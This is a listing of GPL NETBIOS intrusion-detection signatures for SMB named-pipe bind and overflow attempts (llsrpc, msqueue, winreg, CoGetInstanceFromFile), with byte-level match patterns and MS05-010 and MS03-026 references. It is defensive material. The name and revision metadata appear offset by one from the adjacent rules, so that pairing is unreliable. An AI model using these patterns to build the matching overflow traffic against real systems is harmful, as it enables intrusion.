Name : SMB llsrconnect andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103119

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103119; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103120

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103120; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103121

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103121; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103102

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103102; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103092

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|llsrpc|00|"; within:8; distance:51; nocase; classtype:protocol-command-decode; sid:2103092; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103103

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103103; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103104

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103104; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103093

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|l|00|l|00|s|00|r|00|p|00|c|00 00 00|"; within:16; distance:51; nocase; classtype:protocol-command-decode; sid:2103093; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103105

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103105; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103164

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103164; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103165

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103165; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103166

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103166; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103167

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103167; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103206

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103206; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103207

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103207; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103208

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103208; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103209

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103209; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103188

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103188; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103438

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103438; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103189

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103189; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103439

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103439; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103190

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103190; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

